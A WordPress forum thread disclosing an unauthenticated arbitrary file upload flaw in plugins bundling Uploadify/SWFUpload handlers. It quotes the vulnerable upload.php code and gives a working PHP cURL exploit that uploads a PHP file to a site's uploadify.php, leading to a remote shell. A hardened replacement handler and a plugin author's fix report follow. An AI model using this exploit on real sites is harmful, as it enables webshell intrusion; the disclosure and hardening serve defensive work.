
UPLOADIFY AND SWFUPLOAD ARBITRARY FILE UPLOAD (6 posts)

  1. A-T
    Member
    Posted 2 years ago

    In all plugins that contain this lib:

    -> js/swfupdate/js/upload.php
    -> upload/php.php
    -> includes/doajaxfileupload.php
    -> uploadify/uploadify.php

    and more...

    Ex. vuln plugins:

    -> front-end-upload
    -> front-file-manager
    -> omni-secure-files

    Ex. vuln code:

    <?php
    /**
     * upload.php
     *
     * Copyright 2009, Moxiecode Systems AB
     * Released under GPL License.
     *
     * License: http://www.plupload.com/license
     * Contributing: http://www.plupload.com/contributing
     */
    
    // HTTP headers for no cache etc
    header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
    header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Cache-Control: post-check=0, pre-check=0", false);
    header("Pragma: no-cache");
    
    // we need these WP files to grab our destination dir
    // NOTE: this file is requested directly over HTTP (not through admin-ajax.php),
    // so WordPress is bootstrapped for any unauthenticated visitor and nothing
    // shown here checks a nonce, a capability or the uploaded file type.
    ob_start();
    require_once( preg_replace( "/wp-content.*/","wp-load.php", __FILE__ ) );
    require_once( preg_replace( "/wp-content.*/","/wp-admin/includes/admin.php", __FILE__ ) );
    ob_end_clean();
    
    // Settings
    //$targetDir = ini_get("upload_tmp_dir") . DIRECTORY_SEPARATOR . "plupload";
    $targetDir = FEU_DESTINATION_DIR;
    [...]

    Exploit code:

    <?php
    // Local file to upload (here a PHP script on the attacker's own machine).
    $u = "C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";

    // POST the file straight to the plugin's bundled upload handler.
    $c = curl_init("http://site.com/PLUGIN-NAME/uploads/uploadify.php");
    curl_setopt($c, CURLOPT_POST, true);
    // "Filedata" is the field name Uploadify expects. The "@path" prefix is the
    // legacy cURL file-upload syntax; on PHP >= 5.6 it is disabled by default
    // and new CURLFile($u) must be used instead.
    curl_setopt($c, CURLOPT_POSTFIELDS, array('Filedata' => "@$u"));
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    $e = curl_exec($c);
    curl_close($c);
    // The handler's response normally contains the stored file name/path.
    echo $e;
    ?>

    The remote shell "shell.php" is then accessible from the upload or temp folder.
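
    The handler quoted above is reachable by anyone and, in the part shown, never asks who is uploading or what is being uploaded. The following is an added example of how such a handler can be hardened with WordPress's own APIs; it is not code from the original post or from any of the plugins named in it. The hook name `feu_secure_upload`, the function name and the `Filedata` field name are assumptions made for this example.

    ```php
    <?php
    /*
     * Added example (not from the original post or the Front End Upload plugin):
     * a hardened replacement for a stand-alone upload.php handler.
     * The hook name "feu_secure_upload", the nonce action and the field name
     * "Filedata" are assumptions made for this example.
     */

    // Register the handler only for logged-in users. There is deliberately no
    // matching wp_ajax_nopriv_ hook, so an anonymous POST never reaches it, and
    // the file is never requested directly as the original upload.php was.
    add_action( 'wp_ajax_feu_secure_upload', 'feu_secure_upload_handler' );

    function feu_secure_upload_handler() {
        // 1. CSRF: the request must carry a nonce created with
        //    wp_create_nonce( 'feu_secure_upload' ) in the form or JS.
        //    check_ajax_referer() dies with HTTP 403 when it is missing or stale.
        check_ajax_referer( 'feu_secure_upload', 'nonce' );

        // 2. Authorisation: the caller must be allowed to upload files.
        if ( ! current_user_can( 'upload_files' ) ) {
            wp_send_json_error( 'insufficient privileges', 403 );
        }

        if ( empty( $_FILES['Filedata'] ) || ! is_array( $_FILES['Filedata'] ) ) {
            wp_send_json_error( 'no file', 400 );
        }
        $file = $_FILES['Filedata'];

        // 3. Allow-list of types: extension and sniffed content must agree.
        //    Executable types (php, phtml, ...) are rejected simply by omission.
        $allowed_mimes = array(
            'jpg|jpeg' => 'image/jpeg',
            'png'      => 'image/png',
            'gif'      => 'image/gif',
            'pdf'      => 'application/pdf',
        );
        $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed_mimes );
        if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
            wp_send_json_error( 'file type not allowed', 415 );
        }

        // 4. Let core move the file: wp_handle_upload() re-checks the type against
        //    $allowed_mimes, sanitises the file name and writes into wp_upload_dir()
        //    instead of a plugin-chosen directory such as FEU_DESTINATION_DIR.
        $result = wp_handle_upload( $file, array(
            'test_form' => false,
            'mimes'     => $allowed_mimes,
        ) );
        if ( isset( $result['error'] ) ) {
            wp_send_json_error( $result['error'], 400 );
        }

        wp_send_json_success( array( 'url' => $result['url'] ) );
    }
    ```

    The front-end form posts to `/wp-admin/admin-ajax.php` with `action=feu_secure_upload`, a `nonce` field and the file in `Filedata`. Run against this handler, the cURL exploit above fails three times over: the anonymous request never reaches the hook, a request without a valid nonce is rejected, and `info.php` or `shell.php` matches no entry in the allow-list.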

  2. I've not been able to locate those plugins (I blame a lack of sleep).

    If that's from plugins that are hosted in the WordPress repository, can you email the details (which plugins) to plugins AT wordpress.org or security AT wordpress.org?

    As with other vulnerable software (think timthumb), that's a very serious issue.

  3. A-T
    Member
    Posted 2 years ago

    I just sent you a mail

  4. It's not me as I'm not on either of those teams, but thank you. Informing the correct people is appreciated. ;)

  5. A-T
    Member
    Posted 2 years ago

    Sure

    Lots of the most-used plugins are concerned (> 100).

  6. Jonathan Christopher
    Member
    Posted 2 years ago

    I've updated Front End Upload to close this issue with that plugin.

This topic has been closed to new replies.